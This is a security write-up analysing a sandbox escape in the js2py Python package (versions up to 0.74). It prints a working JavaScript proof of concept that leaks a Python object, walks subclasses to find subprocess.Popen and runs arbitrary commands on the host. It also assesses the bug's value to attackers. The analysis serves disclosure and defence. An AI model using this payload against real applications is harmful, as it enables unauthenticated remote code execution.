Js2py is JavaScript to Python Translator & JavaScript interpreter written in 100% pure Python. It’s described as an implementation of JavaScript core in python. There exists a sandbox escape vulnerability in versions of js2py <= 0.74. The vulnerability allows for an attacker to obtain a reference to a python object in the js2py environment enabling them to escape the sandbox and execute arbitrary commands on the host. At the time of writing no patch has been merged into the main branch of the project, although there is a PR up. Version 0.74 is the latest version of js2py which was released Nov 6, 2022.

If we take a look at the proposed one line patch we can see the issue is quite apparent:

The method getOwnPropertyNames is supposed to return a list of the object’s own keys however it mistakenly returns a reference to the object itself. With knowledge we can analyze the PoC and see how this bug allows for RCE. The following is a javascript payload an attacker would send to a vulnerable endpoint to be parsed by js2py:

object = Object.getOwnPropertyNames({})       // [1] 
attribute = object.__getattribute__           // [2] 
n11 = attribute("__getattribute__")           // [3] 
obj = n11("__class__").__base__               // [4]

• [1]: Object.getOwnPropertyNames({}) we know from the brief patch analysis incorrectly returns a Python object instead of a list of property names, causing unexpected behavior in subsequent introspection.
  
• [2] .__getattribute__ is a special method that allows you to customize the attribute access behavior for an object. It is called whenever an attribute is accessed on an object, regardless of whether the attribute exists or not. This line stores the __getattribute__ method of the object in variable attribute.
  
• [3] This line calls the __getattribute__ method (stored in attribute) with the argument __getattribute__. This retrieves the __getattribute__ method from the Python object and assigns it to n11. If python object introspection reminds you of the movie inception, that’s okay.
  
• [4] Now we have a function n11 which we can use to access the __class__ attribute of the object and then the __base__ attribute of its class. And with this in place now we can do some damage.
  

We can see how the PoC then takes that object and sends it off to the function findpopen(o).

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()

This function iterates through all of the object’s subclasses in order to find subprocess and its corresponding Popen function. Now with a reference to Python’s
Popen we can send arbitrary commands to the target, remotely, without authentication, directly from javascript. Very cool. The full PoC can be found here.

Attacker Value and Exploitability

Js2py is just a python package and in order to be exploitable needs to be used by an application in a way that exposes the vulnerable API functionality to attackers. This makes things interesting – it’s not technically vulnerable by default but at the same time it’s a bit harder to determine where vulnerable instances of js2py could be lurking. The github repo says the package is used by 15,623. Seeing as the vulnerability is still unpatched I’d say this is fairly useful to attackers for a vulnerability in a python package. It’s also quite easy to exploit if the application is using js2py in a vulnerable configuration.

Related – CVE-2024-39205

This CVE is for Pyload, a python download manager which incorrectly exposes js2py making it vulnerable to this javascript sandbox escape. For more information on how this can be exploited check out the AKB article.